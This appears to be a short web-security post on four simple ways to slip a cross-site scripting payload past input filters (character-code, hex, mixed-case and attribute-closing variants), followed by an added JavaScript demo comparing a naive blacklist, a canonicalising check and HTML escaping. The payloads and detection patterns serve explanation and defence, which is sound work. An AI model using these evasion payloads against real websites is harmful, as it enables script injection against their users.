Four super-basic bypass methods.

1. Convert to ASCII codes
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41)</script>
2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3. Change the letter case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>
4. Add a closing marker ">
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: "><script>alert(‘I love F4ck’)</script>
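An added example, not code from the original post, showing what the four tricks above mean for the filter on the receiving side. The five sample strings are constructed to mirror the post's payloads (curly quotes included); the function names naiveBlacklistBlocks, canonicalize, hardenedCheckBlocks, escapeHtml, renderInAttribute and report are illustrative and belong to no real product. It shows that a case-sensitive literal blacklist misses tricks 1 to 3, that a check which percent-decodes, folds case and matches the tag rather than the payload text catches all of them, and that contextual output encoding, the actual fix, neutralises every variant including the attribute breakout of trick 4, which no string matcher addresses.

```javascript
// Added example (not code from the original post). The payload variants
// below are constructed to mirror the post's samples, curly quotes included.

const SAMPLES = {
  plain:     "<script>alert(\u2018I love F4ck\u2019)</script>",
  charcode:  "<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41)</script>",
  hex:       "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e",
  mixedCase: "<ScRipt>AleRt(\u2018I love F4ck\u2019)</sCRipT>",
  closeTag:  "\"><script>alert(\u2018I love F4ck\u2019)</script>",
};

// (a) Naive blacklist: exact, case-sensitive substring match on the raw input.
// Returns true when the input is blocked. Tricks 1-3 from the post get past it.
function naiveBlacklistBlocks(input) {
  return input.includes("<script>alert(");
}

// (b) Canonicalise before matching: percent-decode until the string stops
// changing (so double-encoding does not help either), then fold case.
// Only well-formed %XX pairs are decoded; in the post's hex sample "%2018"
// is not a single valid escape, so "%20" becomes a space and "18" stays.
function canonicalize(input) {
  let prev;
  let cur = input;
  do {
    prev = cur;
    cur = cur.replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  } while (cur !== prev);
  return cur.toLowerCase();
}

// Match the structural element (a script tag) rather than the payload text,
// so obfuscating the argument of alert() with fromCharCode changes nothing.
function hardenedCheckBlocks(input) {
  return /<\s*script\b/.test(canonicalize(input));
}

// (c) The actual mitigation: encode untrusted data for the HTML context it
// lands in. After this, no input can open a tag or close an attribute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical template: untrusted value placed inside a double-quoted attribute.
// With escaping applied, the rendered markup contains exactly two double quotes.
function renderInAttribute(value) {
  return `<input value="${escapeHtml(value)}">`;
}

// Side-by-side report over all samples; returns an object so it can be checked.
function report() {
  const out = {};
  for (const [name, payload] of Object.entries(SAMPLES)) {
    out[name] = {
      naiveBlocks: naiveBlacklistBlocks(payload),
      hardenedBlocks: hardenedCheckBlocks(payload),
      encoded: escapeHtml(payload),
    };
  }
  return out;
}

for (const [name, r] of Object.entries(report())) {
  console.log(`${name.padEnd(10)} naive=${r.naiveBlocks} hardened=${r.hardenedBlocks}`);
  console.log(`           encoded=${r.encoded}`);
}
```

The canonicalise-then-match check is still a blacklist and only illustrates why the post's tricks work; treat escapeHtml (or a templating engine that encodes by context) as the control to rely on, since it makes the question of which spelling of <script> was used irrelevant.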
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

The conversion tool used is the Firefox HackBar Mozilla add-on.